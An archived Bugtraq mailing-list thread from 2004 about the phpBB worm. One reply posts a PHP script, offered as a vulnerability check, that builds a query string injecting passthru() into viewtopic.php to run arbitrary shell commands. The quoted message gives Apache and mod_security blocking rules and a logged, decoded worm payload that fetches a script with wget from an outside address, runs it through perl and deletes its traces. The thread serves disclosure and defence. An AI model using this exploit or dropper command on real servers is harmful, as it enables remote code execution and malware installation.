[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: phpBB Worm

To: "Sebastian Wiesinger" <bofh@xxxxxxxxxxxxx>, <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: Re: phpBB Worm
From: "William Geoghegan" <w.geoghegan@xxxxxxxxxxxxxx>
Date: Wed, 22 Dec 2004 23:34:12 -0000

A script to check if your phpBB is vulnerable. Anything below 2.0.11 _probably_ is but incase your not sure, use this script.

The script generates the request parameters, all you need to do is copy the result onto www.thesite.com/viewtopic.php


<?
$rush='ls -al'; //do what
$highlight='passthru($HTTP_GET_VARS[rush])'; // dont touch

print "?t=%37&rush=";

for ($i=0; $i<strlen($rush); ++$i) {
 print '%' . bin2hex(substr($rush,$i,1));
}

print "&highlight=%2527.";

for ($i=0; $i<strlen($highlight); ++$i) {
 prt '%' . bin2hex(substr($highlight,$i,1));
}

print ".%2527";
?>

Cheers.

William Geoghegan

GEOTEK Computer Services
- www.geotekcs.co.uk -

----- Original Message ----- From: "Sebastian Wiesinger" <bofh@xxxxxxxxxxxxx> To: <bugtraq@xxxxxxxxxxxxxxxxx> Sent: Wednesday, December 22, 2004 11:22 AM Subject: Re: phpBB Worm

* Raymond Dijkxhoorn <raymond@xxxxxxxxxxxxxxx> [2004-12-22 00:06]:
If you cannot fix it (virtual servers) fast for all your clients you could also try with something like this:

RewriteEngine On RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR] RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) RewriteRule ^.*$ - [F]
We had some vhosts where this worked just fine. On our systems we didnt
see any valid request with echr and esystem, just be gentle with it, it
works for me, it could work for you ;)
If you use mod_security, this may help, too:

SecFilterSelective "THE_REQUEST" "(system|exec|passthru|popen|shell_exec|proc_open|fopen|fwrite)\s*\("

I had another exploit attempt, with this payload:

66.119.13.4 - - [22/Dec/2004:10:06:47 +0100] "GET /forum/viewtopic.php?t=%37&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%31%32%38%2E%31%37%34%2E%31%33%37%2E%32%33%30%2F%62%6E%20%2D%4F%20%2E%62%3B%20%70%65%72%6C%20%2D%70%65%20%79%2F%74%68%6D%76%64%77%30%39%38%37%36%35%34%33%32%31%75%6F%69%65%61%2F%61%65%69%6F%75%31%32%33%34%35%36%37%38%39%30%77%64%76%74%68%6D%2F%20%2E%62%7C%20%70%65%72%6C%3B%20%72%6D%20%2D%66%20%2E%62%20%2A%2E%70%6C%20%62%30%74%2A%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 12266 "-" "-"

Which decodes to:

rush=echo _START_; cd /tmp;wget 128.174.137.230/bn -O .b; perl -pe y/thmvdw0987654321uoiea/aeiou1234567890wdvthm/ .b| perl; rm -f .b *.pl b0t*; echo _END_ highlight='.passthru($HTTP_GET_VARS[rush]).'

Regards,

Sebastian
--
GPG Key-ID: 0x76B79F20 (0x1B6034F476B79F20)
Wehret den Anfaengen: http://odem.org/informationsfreiheit/
Thunder rolled. ... It rolled a six.
 --Terry Pratchett, Guards! Guards!
--
No virus found in this incoming message.
Checked by AVG Anti-Virus.
Version: 7.0.298 / Virus Database: 265.6.4 - Release Date: 22/12/2004

References:
- phpBB Worm
  - From: Shannon Lee
- Re: phpBB Worm
  - From: Raymond Dijkxhoorn
- Re: phpBB Worm
  - From: Sebastian Wiesinger

Prev by Date: Inexcusable weakness in Kmail / GnuPG
Next by Date: Re: [webmin-l] Re: Webmin BruteForce + Command execution - By Di42lo <DiAblo_2@012.net.il>
Previous by thread: Re: phpBB Worm
Next by thread: Re: phpBB Worm
Index(es):
- Date
- Thread